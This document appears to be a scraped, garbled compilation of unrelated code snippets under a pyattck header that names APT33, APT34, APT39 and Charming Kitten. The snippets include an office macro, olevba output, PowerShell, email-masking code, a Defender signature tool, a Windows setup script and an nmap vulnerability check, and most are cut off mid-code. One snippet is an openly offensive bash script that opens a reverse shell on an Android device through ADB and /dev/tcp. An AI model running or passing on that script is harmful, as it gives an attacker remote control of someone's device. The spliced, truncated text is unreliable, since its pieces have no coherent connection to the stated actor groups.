Overview
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
sub StraightQuotes2CurlyQuotes
' Kudos to David for main code: https://gist.github.com/dajare/3924560
' Kudos to Villeroy for simpler, better find patterns:
' https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=39902
' Kudos to Kaloian Droganov for how to make the macro atomic:
' http://stackoverflow.com/questions/853372/how-to-make-a-macro-atomic
rem ----------------------------------------------------------------------
dim document as object
dim dispatcher as object
dim undo as object
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
param(
[string]$baseDir = "C:\SomeFolderToStoreTheData\",
[string]$bw_client = "000",
[string]$bw_user = "YOURUSERNAME",
[string]$bw_password = "YOURPASSWORD",
[string]$filePath = "Path to Analysis Office Excel.xlsx",
[string]$year_column = "Analysis Technical Name of Year column"
)
# Essentially the Powershell version of https://blogs.sap.com/2016/12/18/automated-updating-of-data-in-excel-files-bex-ao-via-vbavbscript/
#!/bin/bash
# Simple reverse shell on android device using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
/* Not sure if this has any effect against email scraping bots but it's an idea.
It just outputs the string as an array of character codes, then restores it
to real characters after the page loads. With javascript disabled we fail. :( */
// PHP function ///////////////////////////////////
function mask($str) {
$mask = "";
for($c=0;$c<strlen($str);$c++) {
$mask .= "" . ord($str[$c]) . ",";
}
/*
Create a Mask in an email address
This function creates a mask using a valid email address.
This is useful when someone needs to confirm the email used in a system
Author: Gabriel Froes - https://gist.github.com/gabrielfroes
*/
function emailMask(email) {
var maskedEmail = email.replace(/([^@\.])/g, "*").split('');
var previous = "";
for(i=0;i<maskedEmail.length;i++){
filter Expand-DefenderAVSignatureDB {
<#
.SYNOPSIS
Decompresses a Windows Defender AV signature database (.VDM file).
.DESCRIPTION
Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported, although I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.
########## | |
# Win10 Initial Setup Script | |
# Author: Disassembler, Gr1d:, TheRoc | |
# Edited by Gr1D: | |
# dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/ | |
# TheROC's E.T. Disable script: https://gist.github.com/thoroc/86d354d029dda303598a | |
# THIS IS VERSION 5.5, error suppression is turned on. PLEASE be patient and PLEASE restart after running the script. | |
# This script leaves more MS defaults on, including MSE and smart-screen, | |
# but blocks a ton of domains and disables remote assistance, secures java, sets up ipsec..
local bin = require "bin"
local io = require "io"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
description = [[
Simple module to test Oracle DB server for TNS Poison vulnerability.
Module sends to server a packet with command to register new TNS Listener and check response